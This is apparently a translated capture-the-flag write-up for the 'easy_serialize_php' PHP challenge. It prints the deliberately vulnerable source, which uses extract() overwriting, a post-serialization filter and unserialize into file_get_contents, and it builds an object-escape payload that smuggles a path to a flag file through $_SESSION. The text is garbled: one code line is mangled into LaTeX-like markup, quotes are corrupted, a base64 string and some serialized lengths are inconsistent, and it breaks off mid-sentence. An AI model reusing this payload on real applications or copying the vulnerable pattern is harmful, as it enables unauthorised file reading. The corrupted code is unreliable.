[Anxun Cup 2019]easy_serialize_php 1

[Anxun Cup 2019]easy_serialize_php 1

Knowledge points:
d0g3_f1ag.php
ZDBnM19mmWFnLnBocA==

	 <?php

$function = @$_GET['f'];//传参

function filter($img){
    
     //这里的作用是进行一个过滤，将危险字符'php','flag','php5','php4','fl1g'进行过滤
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    
    
    unset($_SESSION); //如果变量_SESSION存在，则进行销毁_SESSION
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);// 这里是运用了变量覆盖

if(!$function){
    
    
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    
    
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    
    
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));//哈希函数shal
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    
    
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    
    
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    
    
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));//本题的危险函数，利用此函数进行操作
} 

1.extract function

This function performs variable overwriting, which means that the content of this post is used as the value of the previous variable.

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] ='123';
echo '覆盖前：';
var_dump($_SESSION);
echo "<br>";
extract($_POST);
echo '覆盖后：';
var_dump($_SESSION);

The result is shown in the figure:

2. Learning of _SESSION

For example, when we make a phone call, from the moment the call is made to the moment we hang up, the phone remains connected, so this connected state is called session. It is a public variable that always exists during the interaction between the visitor and the entire website. When the client does not support COOKIE, in order to ensure that the data is correct and safe, the SESSION variable is used.
SESSION understand

3. Object escape

$_SESSION['flagphp']='i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
${}_{S}ESSION{[}^{\prime }im{g}^{\prime }]=sha1(base64_{e}ncode{(}^{\prime }123.ph{p}^{\prime }));//This\; is\; written\; casually123.php.\; In\; the\; end,\; the\; parameters\; given\; by\; the\; program\; will\; be\; escaped,\; and\; it\; doesn\text{'}t\; matter\; what\; you\; write.echoserialize($_SESSION);
//a:2:{s:7:"flagphp";s:45:"i:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s: 3: "img";s:40:"17770ed716103f91ef23d9913f0f6e37d75f4da7";}
//Now flagphp is filtered
a:2:{s:7 :" ";s:45: " i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"17770ed716103f91ef23d9913f0f6e37d75f4da7 ”;}
//The first attribute is named ";s:45: but it was found that the following ones did not match and one was missing;

So add a colon to the value of $_SESSION[‘flagphp’], so that its value is the number 1, and the attribute name is also correct, which is very suitable.

$_SESSION[‘flagphp’]=‘;i:1;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}’;
$_SESSION[‘img’] = sha1(base64_encode(‘123.php’));

//a:2:{s:7:“flagphp”;s:44:“;i:1;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}”;s:3:“img”;s:40:“17770ed716103f91ef23d9913f0f6e37d75f4da7”;}
//a:2:{s:7:" ";s:44: “;i:1;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}”;s:3:“img”;s:40:“17770ed716103f91ef23d9913f0f6e37d75f4da7”;}

Now I wonder why flagphp needs to pass seven numbers? Think about it, there must be dozens of subsequent values ​​during serialization. Assuming it has been replaced with spaces, what will follow? There are ";s:55:"" These are at least 4 characters or more. Why is there 7 numbers, not 8? Because after the attribute name is replaced with a space, the subsequent attribute name can only be 7 values, so the 7-digit number is replaced with a space. I don’t know if you can explain it clearly? However, taste carefully and think more

Very appropriate now. POST value